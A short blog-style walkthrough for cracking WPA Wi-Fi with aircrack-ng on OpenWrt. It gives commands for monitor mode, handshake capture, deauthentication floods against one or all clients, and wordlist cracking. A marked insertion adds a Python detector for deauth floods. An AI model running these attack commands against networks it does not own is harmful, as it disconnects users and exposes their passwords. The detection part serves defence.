Pen Testing OpenWrt

Posted on February 1, 2015
Tags: hackhard
opkg update
opkg install aircrack-ng
#install aircrack-ng from the OpenWrt package feed

iw dev
iw phy phy0 info
#list the wireless interfaces and check that phy0 supports monitor mode

iw phy phy0 interface add mon0 type monitor
ifconfig mon0 up
#create a monitor-mode interface on phy0 and bring it up

ifconfig mon0 down
iw dev mon0 del
#when finished: bring the monitor interface down and delete it

1 Scan for Wi-Fi SSIDs, MAC addresses and channels

airodump-ng --ivs --write testcapture --beacons mon0
#this lists the routers nearby with their BSSID and channel number, which you need for the next step

2 Scan the devices connected to the Wi-Fi, write packets to a file, capture the EAPOL 4-way handshake

airodump-ng -c 12 --bssid 01:02:3E:4F:4E:8C -w psk mon0
#Most important step
#lists the devices (STATIONS) connected and writes the packets out to a *.cap file
#captures the 4-way handshake when EAPOL is seen in the PROBE column

# BSSID                 STATION             PWR     RATE        LOST        FRAMES      PROBE
# 00:00:00:00:00:04     02:01:01:01:01:02   -38     12e-24e     0           42          
# 00:00:00:00:00:04     03:01:01:01:01:01   -54     0e-1e       0           42          
# 00:00:00:00:00:04     01:01:01:01:01:01   -62     24e-24e     0           42          EAPOL <-- We found the 4-way handshake, so you can press Ctrl+C to stop this

3 Disconnect

aireplay-ng --deauth 0 -a 00:00:00:00:00:04 -c 02:01:01:01:01:02 mon0
#deauth a SPECIFIC device on the router

aireplay-ng --deauth 0 -a 00:00:00:00:00:04 mon0
#deauth ALL devices on the router

#use --ignore-negative-one if needed
#aireplay-ng --deauth 0 -a 00:00:00:00:00:04 -c 02:01:01:01:01:02 --ignore-negative-one mon0
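The defender-side counterpart to step 3, added here as an example and not part of the original post: a small parser for 802.11 management frames that flags any transmitter/BSSID pair sending a burst of deauthentication frames, which is exactly what a monitor-mode sensor or WIDS looks for. The frame bytes, addresses and threshold are constructed sample data, not a real capture.

```python
import struct
from collections import Counter

# 802.11 frame control byte 0: bits 2-3 = type, bits 4-7 = subtype.
# Management type 0; subtype 12 = deauthentication (0xC0), 8 = beacon (0x80).
DEAUTH_FC0, BEACON_FC0, SUBTYPE_DEAUTH = 0xC0, 0x80, 12

def parse_mgmt_frame(frame):
    """Parse a 24-byte 802.11 management header into
    (subtype, addr1, addr2, addr3); None for short or non-management frames."""
    if len(frame) < 24 or (frame[0] >> 2) & 0x3 != 0:
        return None
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    return (frame[0] >> 4) & 0xF, mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22])

def deauth_flood_sources(frames, threshold):
    """Count deauth frames per (transmitter addr2, BSSID addr3) and return the
    pairs at or above threshold. A burst of deauths carrying the AP's address
    is the signature of the aireplay-ng step above; a real AP sends very few."""
    counts = Counter()
    for f in frames:
        parsed = parse_mgmt_frame(f)
        if parsed and parsed[0] == SUBTYPE_DEAUTH:
            counts[(parsed[2], parsed[3])] += 1
    return {k: n for k, n in counts.items() if n >= threshold}

def mgmt_frame(fc0, dst, src, bssid, body=b""):
    """Build a minimal management frame (constructed test data, not a capture):
    frame control, duration, addr1-3, sequence control, then the body."""
    return bytes([fc0, 0]) + b"\x00\x00" + dst + src + bssid + b"\x00\x00" + body

# Constructed sample: one beacon, 30 deauths to one client and 5 broadcast
# deauths with the AP address as transmitter (reason code 7), plus 2 ordinary
# deauths from a second AP that should stay below the threshold.
AP, STA, BCAST = bytes.fromhex("000000000004"), bytes.fromhex("020101010102"), b"\xff" * 6
OTHER_AP = bytes.fromhex("000000000005")
REASON = struct.pack("<H", 7)
SAMPLE_FRAMES = ([mgmt_frame(BEACON_FC0, BCAST, AP, AP)]
                 + [mgmt_frame(DEAUTH_FC0, STA, AP, AP, REASON)] * 30
                 + [mgmt_frame(DEAUTH_FC0, BCAST, AP, AP, REASON)] * 5
                 + [mgmt_frame(DEAUTH_FC0, STA, OTHER_AP, OTHER_AP, REASON)] * 2)

if __name__ == "__main__":
    print(deauth_flood_sources(SAMPLE_FRAMES, threshold=10))
    # → {('00:00:00:00:00:04', '00:00:00:00:00:04'): 35}
```

On a network with 802.11w (Protected Management Frames) enabled, clients ignore unauthenticated deauth frames altogether, so the flood is seen by the sensor but does not disconnect anyone.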

4 Cracking the 4-way handshake

get a wordlist, for example from Adj-Noun-Wordlist-Generator

cd Adj-Noun-Wordlist-Generator
./adj | aircrack-ng -w - ~/psk-01.cap -e NETGEARXX
#pipe the generated wordlist into aircrack-ng on stdin (-w -)
aircrack-ng -w somewordlist.txt ~/psk-01.cap -e NETGEARXX
#or read the wordlist from a file